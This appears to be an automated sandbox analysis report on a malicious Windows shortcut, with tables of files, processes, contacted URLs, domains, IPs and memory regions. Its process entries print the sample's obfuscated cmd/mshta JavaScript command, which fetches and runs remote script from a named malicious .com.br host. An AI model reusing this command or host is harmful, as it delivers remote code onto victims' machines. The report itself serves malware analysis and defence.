Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
V_273686.Lnk.lnk
|
MS Windows shortcut, Item id list present, Has command line arguments, Archive, ctime=*Invalid time*, mtime=*Invalid time*,
atime=*Invalid time*, length=812712743, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EJF5C7CA.htm
|
HTML document, Unicode text, UTF-8 text, with very long lines (27738)
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
|
|
|
|
C:\Windows\System32\mshta.exe
|
MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
|
unknown
|
||
|
https://creativecommons.org/licenses/by-sa/4.0/
|
unknown
|
||
|
https://cronal184.phroativa.com.br/?2/l
|
unknown
|
||
|
HTtps://cronal184.phroativa.com.br/?2/
|
unknown
|
||
|
https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c
|
unknown
|
||
|
https://intake-logging.wikimedia.org/v1/eventsx
|
unknown
|
||
|
https://cronal184.phroativa.com.br/
|
unknown
|
||
|
https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.
|
unknown
|
||
|
https://www.wikipedia.org/
|
185.15.59.224
|
||
|
https://cronal184.phroativa.com.br/?2/U
|
unknown
|
||
|
https://play.google.com/store/apps/details?id=org.wikip
|
unknown
|
||
|
HTtps://cronal184.phroativa.com.br/?2/(
|
unknown
|
||
|
https://cronal184.phroativa.com.br/?2/St
|
unknown
|
||
|
https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter
|
unknown
|
||
|
https://meta.wikimedia.org/wiki/Privacy_policy
|
unknown
|
||
|
https://wikis.world/
|
unknown
|
||
|
https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
|
unknown
|
||
|
https://cronal184.phroativa.com.br/?2/
|
172.67.217.192
|
||
|
https://meta.wikimedia.org/wiki/Terms_of_use
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
dyna.wikimedia.org
|
185.15.59.224
|
||
|
cronal184.phroativa.com.br
|
172.67.217.192
|
||
|
www.wikipedia.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.67.217.192
|
cronal184.phroativa.com.br
|
United States
|
||
|
185.15.59.224
|
dyna.wikimedia.org
|
Netherlands
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
290661D3000
|
heap
|
page read and write
|
||
|
29066234000
|
heap
|
page read and write
|
||
|
2906622A000
|
heap
|
page read and write
|
||
|
288641DE000
|
heap
|
page read and write
|
||
|
290661D9000
|
heap
|
page read and write
|
||
|
29066320000
|
trusted library allocation
|
page execute
|
||
|
90D51FB000
|
stack
|
page read and write
|
||
|
2906623B000
|
heap
|
page read and write
|
||
|
28863F83000
|
heap
|
page read and write
|
||
|
288641D6000
|
heap
|
page read and write
|
||
|
290663E0000
|
remote allocation
|
page read and write
|
||
|
2886411D000
|
heap
|
page read and write
|
||
|
29065CC4000
|
heap
|
page read and write
|
||
|
28863FBC000
|
heap
|
page read and write
|
||
|
29066227000
|
heap
|
page read and write
|
||
|
288641D0000
|
heap
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
2906644B000
|
heap
|
page read and write
|
||
|
90D544E000
|
stack
|
page read and write
|
||
|
29066244000
|
heap
|
page read and write
|
||
|
29066478000
|
heap
|
page read and write
|
||
|
29065CC0000
|
heap
|
page read and write
|
||
|
29066201000
|
heap
|
page read and write
|
||
|
28864090000
|
heap
|
page read and write
|
||
|
90D564F000
|
stack
|
page read and write
|
||
|
290661DE000
|
heap
|
page read and write
|
||
|
29066468000
|
heap
|
page read and write
|
||
|
2906623C000
|
heap
|
page read and write
|
||
|
29066210000
|
heap
|
page read and write
|
||
|
29066340000
|
heap
|
page readonly
|
||
|
288641DE000
|
heap
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
290661A3000
|
trusted library allocation
|
page read and write
|
||
|
29066464000
|
heap
|
page read and write
|
||
|
28863FAE000
|
heap
|
page read and write
|
||
|
29066234000
|
heap
|
page read and write
|
||
|
29065FF0000
|
heap
|
page read and write
|
||
|
288640B0000
|
heap
|
page read and write
|
||
|
29065CD7000
|
heap
|
page read and write
|
||
|
29066320000
|
heap
|
page read and write
|
||
|
290661A5000
|
trusted library allocation
|
page read and write
|
||
|
28863F23000
|
heap
|
page read and write
|
||
|
28863EE5000
|
heap
|
page read and write
|
||
|
29066201000
|
heap
|
page read and write
|
||
|
2906623B000
|
heap
|
page read and write
|
||
|
290662C8000
|
trusted library allocation
|
page read and write
|
||
|
2906623B000
|
heap
|
page read and write
|
||
|
290663E0000
|
remote allocation
|
page read and write
|
||
|
2906644E000
|
heap
|
page read and write
|
||
|
28863FB6000
|
heap
|
page read and write
|
||
|
28863FAE000
|
heap
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
28863F93000
|
heap
|
page read and write
|
||
|
29066219000
|
heap
|
page read and write
|
||
|
290661C0000
|
heap
|
page read and write
|
||
|
29066201000
|
heap
|
page read and write
|
||
|
28863EA0000
|
heap
|
page read and write
|
||
|
28863FB9000
|
heap
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
29066412000
|
heap
|
page read and write
|
||
|
29066441000
|
heap
|
page read and write
|
||
|
290661D3000
|
heap
|
page read and write
|
||
|
29066227000
|
heap
|
page read and write
|
||
|
2906622B000
|
heap
|
page read and write
|
||
|
28863F5D000
|
heap
|
page read and write
|
||
|
28863F94000
|
heap
|
page read and write
|
||
|
28863FBD000
|
heap
|
page read and write
|
||
|
29066232000
|
heap
|
page read and write
|
||
|
290661C1000
|
heap
|
page read and write
|
||
|
2906644B000
|
heap
|
page read and write
|
||
|
288641DB000
|
heap
|
page read and write
|
||
|
90D50FE000
|
stack
|
page read and write
|
||
|
290661A9000
|
trusted library allocation
|
page read and write
|
||
|
28863F87000
|
heap
|
page read and write
|
||
|
29066478000
|
heap
|
page read and write
|
||
|
290661D9000
|
heap
|
page read and write
|
||
|
290661D9000
|
heap
|
page read and write
|
||
|
290661CA000
|
heap
|
page read and write
|
||
|
29066468000
|
heap
|
page read and write
|
||
|
2906622D000
|
heap
|
page read and write
|
||
|
29066439000
|
heap
|
page read and write
|
||
|
28864100000
|
trusted library allocation
|
page read and write
|
||
|
28863F8A000
|
heap
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
29066464000
|
heap
|
page read and write
|
||
|
290661DA000
|
heap
|
page read and write
|
||
|
29066457000
|
heap
|
page read and write
|
||
|
28863F83000
|
heap
|
page read and write
|
||
|
290661D9000
|
heap
|
page read and write
|
||
|
29066219000
|
heap
|
page read and write
|
||
|
290661D4000
|
heap
|
page read and write
|
||
|
29066457000
|
heap
|
page read and write
|
||
|
290662DF000
|
trusted library allocation
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
90D4FFE000
|
stack
|
page read and write
|
||
|
29066223000
|
heap
|
page read and write
|
||
|
29066219000
|
heap
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
28863F3D000
|
heap
|
page read and write
|
||
|
290662D5000
|
trusted library allocation
|
page read and write
|
||
|
28864114000
|
heap
|
page read and write
|
||
|
90D554E000
|
stack
|
page read and write
|
||
|
28863ECF000
|
heap
|
page read and write
|
||
|
29069F62000
|
trusted library allocation
|
page read and write
|
||
|
29066223000
|
heap
|
page read and write
|
||
|
29066443000
|
heap
|
page read and write
|
||
|
28863EC0000
|
heap
|
page read and write
|
||
|
28864160000
|
heap
|
page read and write
|
||
|
2906622B000
|
heap
|
page read and write
|
||
|
28864120000
|
trusted library allocation
|
page read and write
|
||
|
29066245000
|
heap
|
page read and write
|
||
|
29066219000
|
heap
|
page read and write
|
||
|
290661D9000
|
heap
|
page read and write
|
||
|
2906646D000
|
heap
|
page read and write
|
||
|
29066478000
|
heap
|
page read and write
|
||
|
2906622A000
|
heap
|
page read and write
|
||
|
29066223000
|
heap
|
page read and write
|
||
|
29066478000
|
heap
|
page read and write
|
||
|
28863FAE000
|
heap
|
page read and write
|
||
|
28863FAE000
|
heap
|
page read and write
|
||
|
290663E0000
|
heap
|
page read and write
|
||
|
2906622A000
|
heap
|
page read and write
|
||
|
28863F54000
|
heap
|
page read and write
|
||
|
290661EF000
|
heap
|
page read and write
|
||
|
290661AB000
|
trusted library allocation
|
page read and write
|
||
|
28863F16000
|
heap
|
page read and write
|
||
|
290661DB000
|
heap
|
page read and write
|
||
|
28863EC7000
|
heap
|
page read and write
|
||
|
29066470000
|
heap
|
page read and write
|
||
|
29066231000
|
heap
|
page read and write
|
||
|
28863F22000
|
heap
|
page read and write
|
||
|
29066227000
|
heap
|
page read and write
|
||
|
2906622A000
|
heap
|
page read and write
|
||
|
29066227000
|
heap
|
page read and write
|
||
|
290661A1000
|
trusted library allocation
|
page read and write
|
||
|
290662C5000
|
trusted library allocation
|
page read and write
|
||
|
28863F54000
|
heap
|
page read and write
|
||
|
90D4BFE000
|
stack
|
page read and write
|
||
|
29065FF4000
|
heap
|
page read and write
|
||
|
90D4CFE000
|
stack
|
page read and write
|
||
|
29065CDE000
|
heap
|
page read and write
|
||
|
290663E0000
|
remote allocation
|
page read and write
|
||
|
290661CA000
|
heap
|
page read and write
|
||
|
29066223000
|
heap
|
page read and write
|
||
|
28863F5E000
|
heap
|
page read and write
|
||
|
29066234000
|
heap
|
page read and write
|
||
|
28864150000
|
heap
|
page read and write
|
||
|
29065CD9000
|
heap
|
page read and write
|
||
|
29066430000
|
heap
|
page read and write
|
||
|
29065CE1000
|
heap
|
page read and write
|
||
|
28863F3E000
|
heap
|
page read and write
|
||
|
290661DB000
|
heap
|
page read and write
|
||
|
90D4AF5000
|
stack
|
page read and write
|
||
|
29066434000
|
heap
|
page read and write
|
||
|
290662C0000
|
trusted library allocation
|
page read and write
|
||
|
29066410000
|
heap
|
page read and write
|
||
|
29066457000
|
heap
|
page read and write
|
||
|
2906644B000
|
heap
|
page read and write
|
||
|
290661AD000
|
trusted library allocation
|
page read and write
|
||
|
28864110000
|
heap
|
page read and write
|
There are 150 hidden memdumps, click here to show them.